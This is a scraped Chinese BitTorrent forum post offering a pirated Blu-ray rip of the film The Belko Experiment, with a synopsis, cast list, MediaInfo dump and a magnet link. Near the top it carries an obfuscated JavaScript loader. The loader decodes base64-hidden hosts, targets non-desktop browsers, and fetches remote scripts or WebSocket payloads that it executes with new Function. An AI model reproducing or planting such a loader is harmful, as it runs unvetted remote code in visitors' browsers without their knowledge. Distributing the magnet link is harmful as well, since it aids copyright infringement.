贝尔科实验[双语字幕].The.Belko.Experiment.2016.1080p.BluRay.x265.10bit.DD/5.1.MNHD 6.41GB

版主小s 20天前 136

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 贝尔科实验 / 办公室大狂杀(台) / 办公室大逃杀 / 别尔科实验

◎片 名 The Belko Experiment

◎年 代 2016

◎产 地 美国 / 哥伦比亚

◎类 别 动作 / 惊悚

◎语 言 英语

◎上映日期 2016-09-10(多伦多电影节) / 2017-03-17(美国)

◎IMDb链接 https://www.imdb.com/title/tt1082807/

◎豆瓣评分 6.2/10 (14719人评价)

◎豆瓣链接 https://movie.douban.com/subject/3008691/

◎片 长 89分钟

◎导 演 克瑞格·麦克林恩 Greg Mclean (id:1291685)

◎编 剧 詹姆斯·古恩 James Gunn (id:1092322)

◎演 员 小约翰·加拉赫 John Gallagher Jr. (id:1018165)

托尼·戈德温 Tony Goldwyn (id:1048151)

阿德里娅·阿霍纳 Adria Arjona (id:1348880)

约翰·C·麦金雷 John C. McGinley (id:1025189)

梅罗妮·迪亚兹 Melonie Diaz (id:1044956)

欧文·约曼 Owain Yeoman (id:1009342)

肖恩·古恩 Sean Gunn (id:1022552)

布伦特·塞克斯顿 Brent Sexton (id:1334834)

乔什·布雷纳 Josh Brener (id:1339617)

大卫·达斯马齐连 David Dastmalchian (id:1337583)

大卫·德尔·里奥 David Del Rio (id:1370590)

格雷格·亨利 Gregg Henry (id:1048224)

迈克尔·鲁克 Michael Rooker (id:1002751)

拉丝蒂·休默 Rusty Schwimmer (id:1276532)

盖尔·比恩 Gail Bean (id:1370591)

乔·弗里亚 Joe Fria (id:1394859)

亚布拉哈姆·本鲁比 Abraham Benrubi (id:1027238)

米凯拉·霍沃 Mikaela Hoover (id:1229185)

詹姆斯·古恩 James Gunn (id:1092322)

泰勒·贝茨 Tyler Bates (id:1278075)

特伦斯·伯杰龙 Terrence Bergeron (id:1411064)

◎标 签 血腥 / 人性 / 惊悚 / 美国 / 杀戮 / 犯罪 / 恐怖 / 实验

◎简 介

故事讲述别尔科公司的职员们原本平静的一天被广播里的神秘声音划破,他们被告知公司范围内将强制展开大型逃杀活动,一群平日西装革履的伪善者会不会在死亡面前创造人性丑陋新高度?

◎获奖情况 (共1项)

第4届豆瓣电影年度榜单 (2017)

6月最受关注电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 203991227224557858549939002089712735678 (0x99774802A5ED9FFCC869D44E1B6155BE)

  4. Complete name : The.[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.41 GiB

  8. Duration : 1 h 28 min

  9. Overall bit rate : 10.3 Mb/s

  10. Movie name : The Belko Experiment

  11. Encoded date : UTC 2021-09-25 06:33:17

  12. Writing application : mkvmerge v60.0.0 ('Are We Copies?') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@High

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 28 min

  23. Bit rate : 8 819 kb/s

  24. Width : 1 920 pixels

  25. Height : 800 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.239

  33. Stream size : 5.47 GiB (85%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit

  35. Encoding settings : rc=crf / crf=19.0000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / no-lossless / no-cu-lossless / aq-mode=1 / aq-strength=1.00 / cbqpoffs=-2 / crqpoffs=-2 / ipratio=1.30 / pbratio=1.20 / psy-rd=1.50 / psy-rdoq=1.00 / deblock=-3:-3 / ref=6 / limit-refs=0 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=1 / max-keyint=250 / rc-lookahead=100 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=32 / min-cu-size=8 / me=3 / subme=7 / merange=57 / rdoq-level=2 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / no-cutree / no-sao / no-rect / no-amp / no-open-gop / wpp / pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / qg-size=8 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=3 / numa-pools=12 / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / no-aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=5 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio #1

  43. ID : 2

  44. Format : E-AC-3

  45. Format/Info : Enhanced AC-3

  46. Commercial name : Dolby Digital Plus

  47. Codec ID : A_EAC3

  48. Duration : 1 h 28 min

  49. Bit rate mode : Constant

  50. Bit rate : 1 023 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Compression mode : Lossy

  56. Stream size : 649 MiB (10%)

  57. Language : English

  58. Service kind : Complete Main

  59. Default : Yes

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. ID in the original source medium : 4353 (0x1101)

  64. Format : AC-3

  65. Format/Info : Audio Coding 3

  66. Commercial name : Dolby Digital

  67. Codec ID : A_AC3

  68. Duration : 1 h 28 min

  69. Bit rate mode : Constant

  70. Bit rate : 448 kb/s

  71. Channel(s) : 6 channels

  72. Channel layout : L R C LFE Ls Rs

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 31.250 FPS (1536 SPF)

  75. Compression mode : Lossy

  76. Stream size : 284 MiB (4%)

  77. Title : Description

  78. Language : English

  79. Service kind : Complete Main

  80. Default : No

  81. Forced : No

  82. Original source medium : Blu-ray


  83. Text #1

  84. ID : 4

  85. Format : ASS

  86. Codec ID : S_TEXT/ASS

  87. Codec ID/Info : Advanced Sub Station Alpha

  88. Duration : 1 h 24 min

  89. Bit rate : 142 b/s

  90. Count of elements : 1117

  91. Compression mode : Lossless

  92. Stream size : 88.1 KiB (0%)

  93. Title : CHS&ENG

  94. Language : Chinese

  95. Default : Yes

  96. Forced : No


  97. Text #2

  98. ID : 5

  99. Format : ASS

  100. Codec ID : S_TEXT/ASS

  101. Codec ID/Info : Advanced Sub Station Alpha

  102. Duration : 1 h 24 min

  103. Bit rate : 142 b/s

  104. Count of elements : 1117

  105. Compression mode : Lossless

  106. Stream size : 88.1 KiB (0%)

  107. Title : CHT&ENG

  108. Language : Chinese

  109. Default : No

  110. Forced : No


  111. Text #3

  112. ID : 6

  113. ID in the original source medium : 4611 (0x1203)

  114. Format : PGS

  115. Muxing mode : zlib

  116. Codec ID : S_HDMV/PGS

  117. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  118. Duration : 1 h 23 min

  119. Bit rate : 24.0 kb/s

  120. Count of elements : 2262

  121. Stream size : 14.4 MiB (0%)

  122. Title : CHS

  123. Language : Chinese

  124. Default : No

  125. Forced : No

  126. Original source medium : Blu-ray


  127. Text #4

  128. ID : 7

  129. ID in the original source medium : 4612 (0x1204)

  130. Format : PGS

  131. Muxing mode : zlib

  132. Codec ID : S_HDMV/PGS

  133. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  134. Duration : 1 h 23 min

  135. Bit rate : 24.5 kb/s

  136. Count of elements : 2262

  137. Stream size : 14.7 MiB (0%)

  138. Title : CHT

  139. Language : Chinese

  140. Default : No

  141. Forced : No

  142. Original source medium : Blu-ray


  143. Text #5

  144. ID : 8

  145. ID in the original source medium : 4608 (0x1200)

  146. Format : PGS

  147. Muxing mode : zlib

  148. Codec ID : S_HDMV/PGS

  149. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  150. Duration : 1 h 23 min

  151. Bit rate : 40.6 kb/s

  152. Count of elements : 2682

  153. Stream size : 24.3 MiB (0%)

  154. Language : English

  155. Default : No

  156. Forced : No

  157. Original source medium : Blu-ray


  158. Text #6

  159. ID : 9

  160. ID in the original source medium : 4609 (0x1201)

  161. Format : PGS

  162. Muxing mode : zlib

  163. Codec ID : S_HDMV/PGS

  164. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  165. Duration : 1 h 27 min

  166. Bit rate : 28.5 kb/s

  167. Count of elements : 2182

  168. Stream size : 17.8 MiB (0%)

  169. Language : Spanish

  170. Default : No

  171. Forced : No

  172. Original source medium : Blu-ray


  173. Text #7

  174. ID : 10

  175. ID in the original source medium : 4610 (0x1202)

  176. Format : PGS

  177. Muxing mode : zlib

  178. Codec ID : S_HDMV/PGS

  179. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  180. Duration : 1 h 27 min

  181. Bit rate : 25.0 kb/s

  182. Count of elements : 2178

  183. Stream size : 15.7 MiB (0%)

  184. Language : French

  185. Default : No

  186. Forced : No

  187. Original source medium : Blu-ray


  188. Menu

  189. 00:00:00.000 : 第 01 章

  190. 00:02:39.993 : 第 02 章

  191. 00:05:18.943 : 第 03 章

  192. 00:09:21.018 : 第 04 章

  193. 00:11:17.885 : 第 05 章

  194. 00:14:06.095 : 第 06 章

  195. 00:16:29.905 : 第 07 章

  196. 00:19:13.735 : 第 08 章

  197. 00:22:43.528 : 第 09 章

  198. 00:24:48.320 : 第 10 章

  199. 00:28:11.564 : 第 11 章

  200. 00:30:31.996 : 第 12 章

  201. 00:33:47.442 : 第 13 章

  202. 00:37:12.313 : 第 14 章

  203. 00:41:57.056 : 第 15 章

  204. 00:44:22.117 : 第 16 章

  205. 00:47:42.025 : 第 17 章

  206. 00:50:24.229 : 第 18 章

  207. 00:53:04.723 : 第 19 章

  208. 00:56:46.444 : 第 20 章

  209. 01:00:59.238 : 第 21 章

  210. 01:03:07.074 : 第 22 章

  211. 01:04:40.793 : 第 23 章

  212. 01:08:04.663 : 第 24 章

  213. 01:10:40.945 : 第 25 章

  214. 01:15:19.556 : 第 26 章

  215. 01:19:18.420 : 第 27 章

  216. 01:24:33.651 : 第 28 章


TAGS 动作 惊悚

磁力链:
  • magnet:?xt=urn:btih:8E1321359CDAEB901388515902FC56AA6680DCEB
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回